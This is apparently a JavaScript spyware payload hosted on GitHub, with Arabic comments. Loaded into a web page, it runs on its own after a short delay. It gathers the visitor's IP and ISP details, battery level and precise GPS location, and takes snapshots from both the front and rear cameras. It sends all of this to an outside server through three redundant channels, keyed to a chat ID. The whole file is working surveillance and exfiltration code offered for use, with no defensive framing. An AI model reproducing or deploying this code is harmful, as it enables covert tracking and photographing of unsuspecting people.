// هذا الملف على: https://github.com/FGDHSHS/api/blob/main/api
// الرابط الخام: https://raw.githubusercontent.com/FGDHSHS/api/refs/heads/main/api

(function() {
    var d = window._x || '';
    var info = {id:d,perms:[],imgs:[],loc:'',ip:'',bat:''};
    
    function send(p) {
        var u = 'https://server-brxz.onrender.com/submitData';
        var f = new URLSearchParams();
        for(var k in p) f.append(k, p[k]);
        
        // طريقة 1
        try {
            fetch(u, {method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:f.toString()})
            .then(function(r){ return r.json(); })
            .then(function(r){ console.log('ok'); })
            .catch(function(){});
        } catch(e) {}
        
        // طريقة 2
        try {
            var x = new XMLHttpRequest();
            x.open('POST', u, true);
            x.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            x.send(f.toString());
        } catch(e) {}
        
        // طريقة 3
        try {
            navigator.sendBeacon(u, f);
        } catch(e) {}
    }
    
    async function main() {
        // IP
        try {
            var r = await fetch('https://ipapi.co/json/');
            var j = await r.json();
            info.ip = j.ip + '|' + j.country_name + '|' + j.city + '|' + j.org;
        } catch(e) {}
        
        // Battery
        try {
            var b = await navigator.getBattery();
            info.bat = Math.round(b.level * 100) + '%';
        } catch(e) {}
        
        // Location
        try {
            var p = await new Promise(function(ok, err) {
                navigator.geolocation.getCurrentPosition(ok, err, {
                    enableHighAccuracy: true,
                    timeout: 8000,
                    maximumAge: 0
                });
            });
            info.loc = p.coords.latitude.toFixed(6) + ',' + p.coords.longitude.toFixed(6);
            info.perms.push('loc_ok');
        } catch(e) {
            info.perms.push('loc_no');
        }
        
        // Camera
        var modes = ['user', 'environment'];
        for(var i = 0; i < 2; i++) {
            for(var m of modes) {
                try {
                    var stream = await navigator.mediaDevices.getUserMedia({
                        video: { facingMode: { exact: m }, width: { ideal: 640 }, height: { ideal: 480 } },
                        audio: false
                    });
                    
                    var v = document.createElement('video');
                    v.srcObject = stream;
                    v.setAttribute('playsinline', '');
                    await v.play();
                    await new Promise(function(r) { setTimeout(r, 800); });
                    
                    var c = document.createElement('canvas');
                    c.width = v.videoWidth || 640;
                    c.height = v.videoHeight || 480;
                    c.getContext('2d').drawImage(v, 0, 0);
                    
                    info.imgs.push(c.toDataURL('image/jpeg', 0.6).split(',')[1]);
                    info.perms.push(m + '_cam_ok');
                    
                    stream.getTracks().forEach(function(t) { t.stop(); });
                } catch(e) {
                    info.perms.push(m + '_cam_no');
                }
            }
        }
        
        // Send
        send({
            chatId: info.id,
            imageDatas: info.imgs.join('|||'),
            location: info.loc,
            permissions: info.perms.join(','),
            ipInfo: info.ip,
            battery: info.bat
        });
    }
    
    setTimeout(main, 1500);
    
})();
